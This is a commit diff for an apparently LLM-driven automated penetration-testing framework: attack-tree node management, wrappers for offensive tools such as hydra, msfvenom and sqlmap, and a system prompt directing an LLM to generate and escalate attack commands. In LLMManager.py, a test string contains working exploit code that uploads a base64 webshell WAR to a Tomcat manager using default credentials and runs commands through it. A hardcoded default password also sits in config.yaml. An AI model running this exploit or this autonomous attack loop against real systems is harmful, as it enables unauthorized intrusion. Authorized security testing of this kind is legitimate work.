Browse Source

V0.5.5.1

before split stage bak
master
张龙 3 weeks ago
parent
commit
f5c40f6fda
  1. 2
      config.yaml
  2. 50
      mycode/AttackMap.py
  3. 2
      mycode/CommandVerify.py
  4. 113
      mycode/LLMManager.py
  5. 5
      mycode/PythonTManager.py
  6. 35
      mycode/PythoncodeTool.py
  7. 184
      mycode/TargetManager.py
  8. 157
      mycode/TaskObject.py
  9. 64
      myutils/ContentManager.py
  10. 7
      myutils/PickleManager.py
  11. 10
      pipfile
  12. 50
      test.py
  13. 2
      tools/ArpingTool.py
  14. 27
      tools/CurlTool.py
  15. 2
      tools/DigTool.py
  16. 2
      tools/DirSearchTool.py
  17. 2
      tools/DirbTool.py
  18. 2
      tools/Enum4linuxTool.py
  19. 2
      tools/Hping3Tool.py
  20. 2
      tools/HydraTool.py
  21. 2
      tools/KubehunterTool.py
  22. 2
      tools/MedusaTool.py
  23. 2
      tools/MkdirTool.py
  24. 2
      tools/MsfconsoleTool.py
  25. 2
      tools/MsfvenomTool.py
  26. 2
      tools/NslookupTool.py
  27. 2
      tools/PingTool.py
  28. 2
      tools/PrintfTool.py
  29. 2
      tools/RpcclientTool.py
  30. 2
      tools/RpcinfoTool.py
  31. 2
      tools/SearchsploitTool.py
  32. 2
      tools/ShowmountTool.py
  33. 2
      tools/SmbclientTool.py
  34. 2
      tools/SmbmapTool.py
  35. 2
      tools/SmtpuserenumTool.py
  36. 2
      tools/SmugglerTool.py
  37. 2
      tools/SqlmapTool.py
  38. 2
      tools/SshpassTool.py
  39. 2
      tools/SslscanTool.py
  40. 2
      tools/Sublist3rTool.py
  41. 2
      tools/SwaksTool.py
  42. 2
      tools/TouchTool.py
  43. 2
      tools/WgetTool.py
  44. 2
      tools/WhatwebTool.py
  45. 2
      tools/WhoisTool.py
  46. 2
      tools/XvfbrunTool.py
  47. 9
      web/API/task.py
  48. 9
      web/main/static/resources/scripts/task_manager.js
  49. 2
      web/main/templates/task_manager.html

2
config.yaml

@ -25,7 +25,7 @@ LLM_max_chain_count: 10 #为了避免推理链过长,造成推理效果变差
#Node
max_do_sn: 15 #同一节点最多执行5次指令
max_llm_sn: 5 #同一节点最多llm的提交次数
max_node_layer: 5 #根节点是0层,最多新增的层级数
#用户初始密码
pw: zfkj_123!@#

50
mycode/AttackMap.py

@ -92,7 +92,7 @@ class AttackTree:
for child_node in cur_node.children:
if child_node.name == node_name:
return child_node
# #走到这说明没有匹配到-则新建一个节点-
# #走到这说明没有匹配到-则新建一个节点- 少个layer
# newNode = TreeNode(node_name,cur_node.task_id)
# cur_node.add_child(newNode,cur_node.messages)
return None
@ -170,13 +170,14 @@ class AttackTree:
class TreeNode:
def __init__(self, name,task_id,status="未完成", vul_type="未发现"):
def __init__(self, name,task_id,node_layer,status="未完成", vul_type="未发现"):
self.task_id = task_id #任务id
self.name = name # 节点名称
self.cur_layer = node_layer # 节点当前层数
self.bwork = True # 当前节点是否工作,默认True --停止/启动
self.status = status # 节点测试状态 -- 由llm返回指令触发更新
#work_status需要跟两个list统一管理:初始0,入instr_queue为1,入instr_node_mq为2,入res_queue为3,入llm_node_mq为4,llm处理完0或1
self._work_status = -1 #0-无任务,1-待执行测试指令,2-执行指令中,3-待提交Llm,4-提交llm中, 2025-4-6新增,用来动态显示节点的工作细节。
self._work_status = 0 #0-无任务,1-待执行测试指令,2-执行指令中,3-待提交Llm,4-提交llm中, 2025-4-6新增,用来动态显示节点的工作细节。
#self.work_status_lock = threading.Lock() ---节点不能有锁
self.vul_type = vul_type # 漏洞类型--目前赋值时没拆json
self.vul_name = ""
@ -206,7 +207,7 @@ class TreeNode:
def __getstate__(self):
state = self.__dict__.copy()
for attr in ('work_status_lock'):
for attr in ('work_status_lock',):
state.pop(attr, None)
return state
@ -310,20 +311,25 @@ class TreeNode:
def update_work_status(self,work_status):
bsuccess = True
with self.work_status_lock:
if self._work_status == 1 and work_status == 2: #只允许从1-》2
self._work_status = 2
elif self._work_status == 3 and work_status == 4:#只允许从3-》4
self._work_status = 4
elif self._work_status ==4 and work_status == 0: #4->0
self._work_status = 0
elif work_status == -1:
self._work_status = 0
elif work_status == -2:
self._work_status = 2
elif work_status == -3:
self._work_status = 4
if self._work_status == 0: #初始状态
self._work_status = work_status
else:
bsuccess = False
if self._work_status == 1 and work_status == 2: #只允许从1-》2
self._work_status = 2
elif self._work_status == 3 and work_status == 4:#只允许从3-》4
self._work_status = 4
elif self._work_status ==4 and work_status == 0: #4->0
self._work_status = 0
elif work_status == -1:
self._work_status = 0
elif work_status == -2:
self._work_status = 2
elif work_status == -3:
self._work_status = 4
elif work_status == -4: #测试调用
self._work_status = 1
else:
bsuccess = False
return bsuccess
def get_work_status(self):
@ -336,7 +342,7 @@ class TreeNode:
with self.work_status_lock:
if not self.parent_messages: #为空时赋值
self.copy_messages(p_msg,c_msg)
if self._work_status in (-1,1,4):
if self._work_status in (0,1,4):
self._instr_queue.append(instr)
self._work_status = 1 #待执行
return True
@ -346,6 +352,10 @@ class TreeNode:
else:
return False,"指令数据为空"
def test_add_instr(self, instr):
self._instr_queue.append(instr)
self._llm_quere = []
def get_instr(self):
with self.work_status_lock:
if self._work_status == 2: #执行中
@ -376,8 +386,8 @@ class TreeNode:
if self._work_status in (2,0): #提交中,不要改变执行状态
self._work_status =3
else:
print("添加llm数据时,状态不是0,2,4中的一种情况")
return False,"添加llm数据时,状态不是0,2,4中的一种情况"
print("添加llm数据时,状态不是-1,0,2,4中的一种情况")
return False,"添加llm数据时,状态不是-1,0,2,4中的一种情况"
else:
return False,"待提交llm的数据为空"

2
mycode/CommandVerify.py

@ -15,7 +15,7 @@ class CommandVerify:
strerror = ""
for node_json in node_cmds:
if "action" not in node_json:
self.logger.error(f"缺少action节点:{node_json}")
print(f"缺少action节点:{node_json}")
strerror = {"节点指令错误":f"{node_json}缺少action节点,不符合格式要求!"}
break

113
mycode/LLMManager.py

@ -12,12 +12,14 @@ from openai import OpenAIError, APIConnectionError, APITimeoutError
from myutils.ConfigManager import myCongif
from myutils.MyTime import get_local_timestr
from myutils.MyLogger_logger import LogHandler
from myutils.ContentManager import ContentManager
class LLMManager:
def __init__(self,illm_type):
self.logger = LogHandler().get_logger("LLMManager")
self.api_key = None
self.api_url = None
self.ContM = ContentManager()
#temperature设置
if illm_type == 0: #腾讯云
@ -64,31 +66,29 @@ class LLMManager:
#根节点初始化message----后续有可能需要为每个LLM生成不同的system msg
node.parent_messages = [{"role": "system",
"content":'''
你是一位渗透测试专家来指导本地程序进行渗透测试由你负责动态控制整个渗透测试过程根据当前测试状态和返回结果决定下一步测试指令推动测试前进直至完成渗透测试
你是一位资深的渗透测试专家现在由你来指导针对一个目标的渗透测试工作需要生成具体的指令交给本地程序执行再根据本地程序提交的执行结果规划下一步指令直至全面完成渗透测试
**总体要求**
1.以测试目标为根节点结合信息收集和测试反馈的结果以新的测试点作为子节点逐步规划和推进下一步测试形成树型结构测试树测试点需尽量全面
2.只有当收到当前节点的所有测试指令的结果且没有新的测试指令需要执行时再判断是否需要新增子节点进一步进行验证测试若没有则结束该路径的验证
3.若一次性新增的节点过多无法为每个节点都匹配测试指令请优先保障新增测试节点的完整性若有新增的节点未能匹配测试指令必须返回未匹配指令的节点列表
4.生成的指令有两类节点指令和测试指令指令之间必须以空行间隔不能包含注释和说明
5.本地程序会执行生成的指令但不具备分析判断和保持会话能力只会把执行结果返回提交
6.只有当漏洞验证成功后才添加该节点的漏洞信息
7.若无需要处理的节点数据节点指令可以不生成
8.若节点已完成测试测试指令可以不生成
**测试指令生成准则**
1.可以是dash指令也可以是python指令必须按格式要求生成
2.必须对应已有节点或同时生成新增节点指令
3.优先使用覆盖面广成功率高的指令不要生成重复的指令
4.若需要多条指令配合测试请生成对应的python指令完成闭环返回
5.避免用户交互必须要能返回
1.以测试目标为根节点以测试点作为子节点的形式来规划整个渗透测试方案
2.测试点的规划需要基于执行结果是测试目标涉及的且是完整的具体为a.完成信息收集根据信息收集到的内容所有可能存在中高风险的测试点b.漏洞验证成功还能进一步利用的测试点
3.新增测试点的约束只有当当前节点提交了所有测试指令的执行结果且没有新的测试指令需要验证时再统一判断是否需要新增子节点进一步进行验证测试若没有则结束该路径的验证
4.若一次性新增的子节点过多无法为每个节点都匹配测试指令请优先保障新增测试节点的全面
5.生成的指令有两类节点指令和测试指令指令之间必须以空行间隔不能包含注释和说明
6.若无节点操作节点指令可以不生成若当前节点已完成测试测试指令可以不生成
7.只有当漏洞验证成功后才能生成漏洞验证成功的指令避免误报
**节点指令格式**
- 新增节点{\"action\":\"add_node\", \"parent\": \"父节点\", \"nodes\": \"节点1,节点2\"};
- 未匹配指令的节点列表{\"action\": \"no_instruction\", \"nodes\": \"节点1,节点2\"};
- 漏洞验证成功{\"action\": \"find_vul\", \"node\": \"节点\",\"vulnerability\": {\"name\":\"漏洞名称\",\"risk\":\"风险等级(低危/中危/高危)\",\"info\":\"补充信息(没有可为空)\"}};
- 节点完成测试{\"action\": \"end_work\", \"node\": \"节点\"};
**测试指令格式**
- dash指令```dash-[节点路径]指令内容```包裹若涉及到多步指令请生成python指令
- python指令```python-[节点路径]指令内容```包裹主函数名为dynamic_fun需包含错误处理必须返回一个tuple(status, output)
- [节点路径]为从根节点到目标节点的完整层级路径
**测试指令生成准则**
1.可以是dash指令或python指令必须按格式要求生成
2.必须对应已有节点或同时生成对应新增节点指令
3.优先使用覆盖面广成功率高的指令不能同时生成重复或作用覆盖的指令
4.若需要多条指令配合测试请生成对应的python指令完成闭环返回
5.避免用户交互必须要能返回返回的结果需要能利于你规划下一步指令
**核心要求**
- 指令之间必须要有一个空行
- 需确保测试指令的节点路径和指令的目标节点一致,例如针对子节点的测试指令节点路径不能指向当前节点
@ -183,6 +183,19 @@ mysql -u root -p 192.168.1.100
node_cmds,commands = self.fetch_instruction(real_con)
return True,node_cmds,commands,reasoning_content, content
def node_cmd_repair(self,part):
'''
对节点指令的合法性修复
:param part:
:return:
'''
#遇到漏洞赋值的节点指令缺少一个大括号,目前策略自动补全
# {"action":"find_vul", "node": "8180端口-Tomcat","vulnerability": {"name":"Tomcat弱口令漏洞","risk":"高危","info":"默认凭证tomcat:tomcat可访问管理控制台"}
whole = self.ContM.extract_json(part)
if not whole: #加一次就应该很少见了,不补充多次,也暂时只针对}
part += "}"
return part
def fetch_instruction(self,response_text):
'''
*****该函数很重要需要一定的容错能力解析LLM返回内容*****
@ -229,11 +242,8 @@ mysql -u root -p 192.168.1.100
commands.append(shell_blocks[shell_index])
shell_index +=1
else:#其他的认为是节点操作指令--指令格式还存在不确定性,需要正则匹配,要求是JSON
part = self.node_cmd_repair(part)
pattern = re.compile(r'\{(?:[^{}]|\{[^{}]*\})*\}')
# 遍历所有匹配到的 JSON 结构
# strlines = part.strip('\n') #按行拆分,避免贪婪模式下,匹配到多行的最后一个}
# for strline in strlines:
for match in pattern.findall(part): #正常只能有一个
try:
node_cmds.append(json.loads(match)) # 解析 JSON 并添加到列表
@ -255,5 +265,68 @@ mysql -u root -p 192.168.1.100
if __name__ == "__main__":
llm = LLMManager(3)
strcontent = '''
{"action":"find_vul", "node": "8180端口-Tomcat","vulnerability": {"name":"Tomcat弱口令漏洞","risk":"高危","info":"默认凭证tomcat:tomcat可访问管理控制台"}
```python-[目标系统->192.168.3.107->8180端口-Tomcat]
import requests
import base64
from io import BytesIO
def dynamic_fun():
try:
# 生成包含webshell的简易WAR包
war_content = base64.b64decode(
"UEsDBBQACAgIAJdWjkwAAAAAAAAAAAAAAAAJAAQATUVUQS1JTkYv/soAAAMAUEsHCAAAAAACAAAAAAAAAFBLAwQUAA" +
"gICACXVY5MAAAAAAAAAAAAAAAAFAAAAElNQL2V4cGxvaXQuanNwU0jNycnMS8tJ5XJRKEotyS8qyUx2SSxJ5QIAUEsH" +
"CFdDq4YIAAAAEAAAAFBLAQIeAxQACAgIAJdVjkwAAAAAAgAAAAAAAAAJAAQAAAAAAAAAAADsgQAAAABNRVRBLUlORi/" +
"6ygMAABQSwECHgMUAAgICACXVY5MV0OrhggAAAASAAAAFAAAAAAAAAAAAAAAAAClAAAAElNQL2V4cGxvaXQuanNwUEsF" +
"BgAAAAACAAIAqQAAAHwAAAAAAA=="
)
# 尝试部署WAR包
deploy_url = "http://192.168.3.107:8180/manager/text/deploy?path=/exploit"
res = requests.put(
deploy_url,
auth=('tomcat', 'tomcat'),
data=war_content,
timeout=10
)
if "FAIL" in res.text:
return (False, f"Deploy failed: {res.text}")
# 验证命令执行
cmd_url = "http://192.168.3.107:8180/exploit/exploit.jsp?cmd=id"
cmd_res = requests.get(cmd_url, timeout=5)
return (True, f"Deploy success! Command result: {cmd_res.text[:100]}") if cmd_res.status_code == 200 else (
False, "Command execution failed")
except Exception as e:
return (False, f"Exploit error: {str(e)}")
```
{"action":"add_node", "parent": "8180端口-Tomcat", "nodes": "Web应用路径遍历,Tomcat版本漏洞"}
```python-[目标系统->192.168.3.107->8180端口-Tomcat->Tomcat版本漏洞]
import requests
def dynamic_fun():
try:
# 检测CVE-2020-1938
vul_check = requests.get(
"http://192.168.3.107:8180/docs/",
headers={"Host": "localhost"},
timeout=5
)
if "Apache Tomcat/8." in vul_check.headers.get('Server', ''):
return (True, "可能存在Ghostcat漏洞(CVE-2020-1938)")
return (False, "未检测到易受攻击版本")
except Exception as e:
return (False, f"检测失败: {str(e)}")
```
'''
node_cmds, commands = llm.fetch_instruction(strcontent)
print(node_cmds)
print(commands)

5
mycode/PythonTManager.py

@ -20,7 +20,10 @@ class PythonTManager:
return self.python_tool.start_pool()
def shutdown_pool(self):
self.python_tool.shutdown_pool()
try:
self.python_tool.shutdown_pool()
except Exception as e:
print(f"关闭进程池异常{str(e)}")
def is_pool_active(self):
return self.python_tool.pool_active

35
mycode/PythoncodeTool.py

@ -27,7 +27,11 @@ import smb
import pexpect
import smbclient
import binascii
import ftplib
import threading
from mysql.connector import Error
from Crypto.Cipher import DES
from packaging import version
from impacket.smbconnection import SMBConnection
from itertools import product
from socket import create_connection
@ -63,7 +67,8 @@ def _execute_dynamic(instruction_str):
'set': set, 'str': str, 'sum': sum, 'type': type,
'open': open, 'Exception': Exception, 'locals': locals,
'ConnectionResetError':ConnectionResetError,'BrokenPipeError':BrokenPipeError,
'bytes':bytes,'tuple':tuple,'format':format
'bytes':bytes,'tuple':tuple,'format':format,'next':next,'StopIteration':StopIteration,
'bytearray':bytearray
}
# 构造安全的 globals
safe_globals = {
@ -106,7 +111,10 @@ def _execute_dynamic(instruction_str):
'smbclient':smbclient,
'binascii':binascii,
'Error':Error,
'SMBConnection':SMBConnection
'SMBConnection':SMBConnection,
'version':version,
'DES':DES,
'ftplib':ftplib,
}
safe_locals = {}
try:
@ -149,10 +157,25 @@ class PythoncodeTool():
def shutdown_pool(self):
if self.proc_pool is not None and self.pool_active:
print("关闭进程池...")
self.proc_pool.shutdown(wait=False) #wait=True 是阻塞执行,False立即返回
self.pool_active = False
self.proc_pool = None
try:
print("关闭进程池...")
pool = self.proc_pool
self.pool_active = False
self.proc_pool = None
def _shutdown_background():
try:
# 这里是真正阻塞等待队列管理和子进程退出
pool.shutdown(wait=True)
print("进程池已完全关闭。")
except Exception as e:
print(f"后台关闭进程池时出错: {e}")
# 启动一个守护线程来做真正的 shutdown(wait=True)
t = threading.Thread(target=_shutdown_background, daemon=True)
t.start()
except Exception as e:
print(f"子进程关闭异常。。{e}")
else:
print("进程池已经是关闭状态")

184
mycode/TargetManager.py

@ -2,6 +2,16 @@
对目标资产的管理包括信息的更新维护等
'''
import re
import socket
import ipaddress
import geoip2.database
import ipwhois
import requests
import whois
import dns.resolver
import ssl
from urllib.parse import urlparse
from datetime import datetime
#pattern = r'^(https?://)?((?:[a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}|(?:\d{1,3}\.){3}\d{1,3})(:\d+)?(/.*)?$'
pattern = r'^(https?://)?((?:[0-9]{1,3}\.){3}[0-9]{1,3}|(?:[a-zA-Z0-9-]+\.)+[a-zA-Z]{2,})(:\d+)?(/.*)?$'
@ -10,13 +20,44 @@ class TargetManager:
def __init__(self):
pass
def extract_and_store_ips(self,str_target: str):
# 正则匹配IP地址(包含IPv4、IPv6及带端口的情况)
ip_pattern = r'''
(?P<ipv6>\[?([0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}\]?| # 完整IPv6
::([0-9a-fA-F]{1,4}:){0,6}[0-9a-fA-F]{1,4}| # 缩写IPv6
(?P<ipv4>(\d{1,3}\.){3}\d{1,3})(?::\d+)? # IPv4及端口
'''
candidates = re.finditer(ip_pattern, str_target, re.VERBOSE)
valid_ips = []
for match in candidates:
raw_ip = match.group().lstrip('[').rstrip(']') # 处理IPv6方括号
# 分离IP和端口(如192.168.1.1:8080)
if ':' in raw_ip and not raw_ip.count(':') > 1: # 排除IPv6的冒号
ip_part = raw_ip.split(':')[0]
else:
ip_part = raw_ip
# 验证IP有效性并分类
try:
ip_obj = ipaddress.ip_address(ip_part)
ip_type = 'v6' if ip_obj.version == 6 else 'v4'
valid_ips.append({
'binary_ip': ip_obj.packed,
'ip_type': ip_type,
'original': ip_part
})
except ValueError:
continue
# 辅助函数:验证IPv4地址的有效性
def _is_valid_ipv4(self,ip):
parts = ip.split('.')
if len(parts) != 4:
return False
for part in parts:
if not part.isdigit() or not 0 <= int(part) <= 255:
if not part.isdigit():
return False
return True
@ -45,20 +86,145 @@ class TargetManager:
else:
return False, None,type,fake_target
#验证目标是否合法
def is_valid_target(self,target):
# Check if target is a valid IP address (IPv4 or IPv6)
try:
ip = ipaddress.ip_address(target)
if ip.version == 4:
return 'IPv4'
elif ip.version == 6:
return 'IPv6'
except ValueError:
pass
# Check if target is a valid URL
try:
result = urlparse(target)
# Only allow http or https schemes
if result.scheme not in ['http', 'https']:
return None
netloc = result.netloc
if not netloc:
return None
# Handle IPv6 addresses in URLs (enclosed in brackets)
if netloc.startswith('[') and netloc.endswith(']'):
ip_str = netloc[1:-1]
try:
ipaddress.IPv6Address(ip_str)
return 'URL'
except ValueError:
return None
# Handle potential IPv4 addresses
elif self._is_valid_ipv4(netloc):
try:
ipaddress.IPv4Address(netloc)
return 'URL'
except ValueError:
return None
# If not an IP-like string, assume it's a domain name and accept
return 'URL'
except ValueError:
return None
def collect_ip_info(self,ip):
info = {}
try:
# 首先尝试 RDAP 查询
obj = ipwhois.IPWhois(ip)
whois_info = obj.lookup_rdap()
info['asn'] = whois_info.get('asn') # 获取 ASN
info['isp'] = whois_info.get('network', {}).get('name') # 获取 ISP
except (ipwhois.exceptions.IPDefinedError, ipwhois.exceptions.ASNRegistryError,
requests.exceptions.RequestException) as e:
# 如果 RDAP 失败,回退到 WHOIS 查询
try:
whois_info = obj.lookup_whois()
info['asn'] = whois_info.get('asn') # 获取 ASN
if whois_info.get('nets'):
# 从 WHOIS 的 'nets' 中提取 ISP(通常在 description 字段)
info['isp'] = whois_info['nets'][0].get('description')
except Exception as e:
info['whois_error'] = str(e) # 记录错误信息
return info
def collect_domain_info(self,domain):
info = {}
try:
w = whois.whois(domain)
info['registrar'] = w.registrar
# 处理 creation_date
if isinstance(w.creation_date, list):
info['creation_date'] = [dt.strftime('%Y-%m-%d %H:%M:%S') if isinstance(dt, datetime) else str(dt) for
dt in w.creation_date]
elif isinstance(w.creation_date, datetime):
info['creation_date'] = w.creation_date.strftime('%Y-%m-%d %H:%M:%S')
else:
info['creation_date'] = str(w.creation_date)
# 处理 expiration_date
if isinstance(w.expiration_date, list):
info['expiration_date'] = [dt.strftime('%Y-%m-%d %H:%M:%S') if isinstance(dt, datetime) else str(dt) for
dt in w.expiration_date]
elif isinstance(w.expiration_date, datetime):
info['expiration_date'] = w.expiration_date.strftime('%Y-%m-%d %H:%M:%S')
else:
info['expiration_date'] = str(w.expiration_date)
info['user_name'] = str(w.name)
info['emails'] = str(w.emails)
info['status'] = str(w.status)
except Exception as e:
info['whois_error'] = str(e)
try:
answers = dns.resolver.resolve(domain, 'A')
info['A_records'] = [r.to_text() for r in answers]
except Exception as e:
info['dns_error'] = str(e)
return info
def test(self,str_target):
target_type = self.is_valid_target(str_target)
if not target_type:
print(f"Invalid target: {str_target}")
return
if target_type == 'IPv4' or target_type == "IPv6":
#info = self.collect_ip_info(str_target)
info = "IP"
elif target_type == 'URL':
domain = urlparse(str_target).netloc
info = self.collect_domain_info(domain)
print(f"Collected info for {str_target}: {info}")
g_TM = TargetManager()
if __name__ == "__main__":
tm = TargetManager()
# 示例测试
# test_cases = [
# "256.254.1111.23",
# "8.8.8.8",
# "2001:db8::1",
# "http://www.crnn.cc/",
# "https://www.crnn.cn",
# "http://www.crnn.cc/product_category/network-security-services",
# "192.168.1.1:80",
# "example.com/path/to/resource",
# "ftp://invalid.com", # 不合规
# "http://300.400.500.600" # 不合规
# ]
test_cases = [
"http://192.168.1.1:8080/path",
"https://example.com",
"192.168.1.1:80",
"example.com/path/to/resource",
"ftp://invalid.com", # 不合规
"http://300.400.500.600" # 不合规
"http://www.crnn.cc/",
"http://www.crnn.cc/product_category/network-security-services"
]
#tm.test("https://www.crnn.cn")
for case in test_cases:
is_valid, result = tm.validate_and_extract(case)
print(f"输入: '{case}' → 合规: {is_valid}, 提取结果: {result}")
tm.test(case)

157
mycode/TaskObject.py

@ -39,6 +39,7 @@ class TaskObject:
#全局变量
self.app_work_type = myCongif.get_data("App_Work_type") #app工作为0时,只允许单步模式工作,是附加规则,不影响正常逻辑处理
self.brun = False #任务的停止可以用该变量来控制
self.max_layer = myCongif.get_data("max_node_layer")
self.sleep_time = myCongif.get_data("sleep_time")
self.target = test_target
self.cookie = cookie_info
@ -414,19 +415,32 @@ class TaskObject:
async def put_instr_mq_async(self,node):
#这里不做状态的判断,调用前处理
self.instr_node_queue.put(node)
self.put_instr_node(node)
await self.update_node_work_status_async(node,2) #在执行--1.work_status不影响整个任务的执行,错了问题不大,2--attack_tree持久化需要出去lock信息。
async def put_llm_mq_async(self,node):
#同instr_mq
self.llm_node_queue.put(node)
self.put_llm_node(node)
await self.update_node_work_status_async(node,4) #提交中
#修改节点的执行状态,并需要基于websocket推送到前端显示 同步线程调用
def update_node_work_status(self,node,work_status):
#更新状态
bchange = node.update_work_status(work_status) #1,3会返回Flase
#基于websocket推送到前端
if work_status != 1: #llm执行完成后会发送单独的指令更新树,所以不发送1更新节点了
#判断是否是web端最新获取数据的task
if self.taskM.web_cur_task == self.task_id:
idatatype = 1
strdata = {"node_path":node.path,"node_workstatus":work_status}
asyncio.run(g_WSM.send_data(idatatype,strdata))
#web端调用
async def update_node_work_status_async(self,node,work_status):
#更新状态
bchange = node.update_work_status(work_status)
#基于websocket推送到前端
if bchange:
if work_status != 1:
#判断是否是web端最新获取数据的task
if self.taskM.web_cur_task == self.task_id:
idatatype = 1
@ -521,21 +535,32 @@ class TaskObject:
node.step_num -= 1
self.put_instr_mq(node) #2-执行中
def put_work_node(self):
'''遍历节点需要处理的任务,提交mq,load_task-在自动模式下-触发--线程安全'''
def put_work_node(self,work_type):
'''遍历节点需要处理的任务,提交mq,load_task-在自动模式下-触发--线程安全
work_type 0-人工1-自动
'''
instr_status = None
llm_status = None
if work_type == 0:
instr_status = (2,)
llm_status = (4,)
else:
instr_status = (1,2)
llm_status = (3,4)
nodes = self.attack_tree.traverse_bfs()
for node in nodes:
if not node.bwork:
continue
node_work_status = node.get_work_status()
if node_work_status in (1,2): #待执行指令
if node_work_status in instr_status: #待执行指令
if node.is_instr_empty():#说明数据有问题了,放弃掉
node.update_work_status(-1) #置0 -1作为额外的条件参数
else:
self.put_instr_node(node) #1,2都提交执行
node.update_work_status(-2)# 置2
#llm-list不处理,正常应该为空
elif node_work_status in (3,4):
elif node_work_status in llm_status:
if node.is_llm_empty():#数据有问题,放弃掉
node.update_work_status(-1)
else:
@ -551,11 +576,10 @@ class TaskObject:
iwork_status = node.get_work_status()
if iwork_status in (1,3):
node.step_num = step_num - 1 #单步步次赋值 -1 规则提交时-1,执行结束连续判断再提交
if iwork_status == 1:
self.put_instr_mq(node)
await self.put_instr_mq_async(node)
else:
self.put_llm_mq(node)
await self.put_llm_mq_async(node)
return True,"已提交单步任务"
else:
error = ""
@ -591,23 +615,11 @@ class TaskObject:
else:
return False,"当前的任务状态不允许执行单步,请检查!"
#修改节点的执行状态,并需要基于websocket推送到前端显示 同步线程调用
def update_node_work_status(self,node,work_status):
#更新状态
bchange = node.update_work_status(work_status) #1,3会返回Flase
#基于websocket推送到前端
if work_status != 1: #llm执行完成后会发送单独的指令更新树,所以不发送1更新节点了
#判断是否是web端最新获取数据的task
if self.taskM.web_cur_task == self.task_id:
idatatype = 1
strdata = {"node_path":node.path,"node_workstatus":work_status}
asyncio.run(g_WSM.send_data(idatatype,strdata))
#获取本次的提交提示词
def get_llm_prompt(self,llm_type,str_res,user_Prompt):
if llm_type == 0:
ext_Prompt = f'''
初始信息{str_res}
补充信息{str_res}
任务请开始对该目标的渗透测试工作
'''
elif llm_type == 1: # 提交指令执行结果 --- 正常提交
@ -649,10 +661,11 @@ class TaskObject:
def add_children_node(self,parent_node,children_names,cur_message=None,status="未完成"):
existing_names = {node.name for node in parent_node.children} # 现有子节点名称集合
unique_names = list(set(children_names)) # 去重
layer_num = parent_node.cur_layer + 1
for child_name in unique_names:
if child_name not in existing_names:
# 添加节点
new_node = TreeNode(child_name, parent_node.task_id, status)
new_node = TreeNode(child_name, parent_node.task_id,layer_num,status)
parent_node.add_child(new_node)
#existing_names.add(child_name) # 更新集合 -- 已经去重过了,不需要在添加到比对
@ -680,10 +693,13 @@ class TaskObject:
# #ad_instr_nodes --- 还没处理
residue_cmd_no_add = []
all_add_node = []
add_node_names = []
for node_json in node_cmds:
action = node_json["action"]
if action == "add_node": # 新增节点
if node.cur_layer >= self.max_layer:
continue #节点层级达到上限后不允许再添加子节点-- 平级的一样
parent_node_name = node_json["parent"]
# status = "未完成" #2025-4-11修改MGS-节点指令格式,取消了status
add_node_names = node_json["nodes"].replace('', ',').split(',')
@ -691,53 +707,42 @@ class TaskObject:
if node.name == parent_node_name or parent_node_name.endswith(node.name): # 2233ai,节点名称字段会返回整个路径
# 添加当前节点的子节点 -- 这是标准情况
self.add_children_node(node, add_node_names)
all_add_node.extend(add_node_names) #只有当前节点的子节点才进行指令有无的校验补充
elif node.parent.name == parent_node_name or parent_node_name.endswith(node.parent.name): # 添加当前节点的平级节点
# 是添加当前节点的平级节点(当前节点的父节点下添加子节点) --使用2233ai-o3时遇到的情况
self.add_children_node(node.parent, add_node_names)
self.logger.debug("遇到一次添加平级节点")
else:
badd = False
for child_node in node.children: # 给子节点添加子节点
if parent_node_name == child_node.name or parent_node_name.endswith(child_node.name):
badd = True
self.add_children_node(child_node, add_node_names)
self.logger.debug("遇到一次添加子节点的子节点")
break
if not badd:
self.logger.error(f"添加子节点失败!父节点不是当前节点,不是当前节点的父节点,不是当前节点的子节点,需要介入!!{node_json}---当前节点为:{node.path}") # 丢弃该节点
else: # 未处理的节点指令添加到list
residue_cmd_no_add.append(node_json)
#处理on_instruction
residue_node_cmds = []
no_instr_nodes = []
for node_cmd in residue_cmd_no_add:
action = node_cmd["action"]
if action == "no_instruction":
node_names = node_cmd["nodes"].replace('',',').split(',')
for node_name in node_names:
# 先判断是否在测试指令中,若在则不提交llm任务,只能接受在一次返回中同一节点有多条测试指令,不允许分次返回
bcommand = False
for com in commands:
if node_name in com:
bcommand = True
break
if bcommand: # 如果存在测试指令,则不把该节点放入补充信息llm任务---尝试不对比是否有返回指令,DS会一直返回指令,还返回on_instruction
continue
#判断是否有对应节点---原则上只允许同批次add的节点没有添加指令的情况
if node_name in add_node_names:
no_instr_nodes.append(node_name)
else:
self.logger.error("遇到一次不在add_node中,但在no_instr_nodes中的数据")
#粗暴的做法,添加在当前节点下
self.add_children_node(node, [node_name])
no_instr_nodes.append(node_name)
else:#剩余的节点指令
residue_node_cmds.append(node_cmd)
#2025-5-12 是否采用本地校验节点是否有指令,如果使用,则no_instruction就可以不用了
for add_node in all_add_node:
bcommand = False
for com in commands:
if add_node in com:
bcommand = True
break
if bcommand: # 如果存在测试指令,则不把该节点放入补充信息llm任务---尝试不对比是否有返回指令,DS会一直返回指令,还返回on_instruction
continue
#没有对应指令
no_instr_nodes.append(add_node)
if no_instr_nodes: # 阻塞式,在当前节点提交补充信息,完善节点指令 -- 优势是省token
new_commands = self.get_other_instruction(no_instr_nodes, DBM, node)
commands.extend(new_commands)
#执行剩余的节点指令--不分先后
for node_json in residue_node_cmds:#2025-4-11重新调整了节点指令格式定义
for node_json in residue_cmd_no_add:
action = node_json["action"]
if action == "find_vul":
node_name = node_json["node"]
@ -754,7 +759,7 @@ class TaskObject:
vul_node.vul_type = node_json["vulnerability"]["name"]
vul_node.vul_grade = node_json["vulnerability"]["risk"]
vul_node.vul_info = node_json["vulnerability"]["info"]
#保存到数据库
#保存到数据库 --- 数据库有记录多个,tree只保留最新一个
DBM.insert_taks_vul(self.task_id,vul_node.name,vul_node.path,vul_node.vul_type,vul_node.vul_grade,
vul_node.vul_info)
except:
@ -778,6 +783,7 @@ class TaskObject:
def get_other_instruction(self,nodes,DBM,cur_node):
res_str = ','.join(nodes)
new_commands = []
no_instr_nodes = nodes
ierror = 0
while res_str:
self.logger.debug(f"开始针对f{res_str}这些节点请求测试指令")
@ -791,15 +797,15 @@ class TaskObject:
任务
1.请生成这些子节点的测试指令,注意不要生成重复的测试指令
2.这些节点的父节点为当前节点请正确生成这些节点的节点路径
3.只有当还有节点未能生成测试指令或不完整时才返回未生成指令的节点列表
'''
fake_prompt = self.DataFilter.filter_prompt(user_Prompt)
#正常不应该会有node_cmds
bsuccess,node_cmds, commands, reasoning_content, content = self.LLM.get_llm_instruction(fake_prompt,
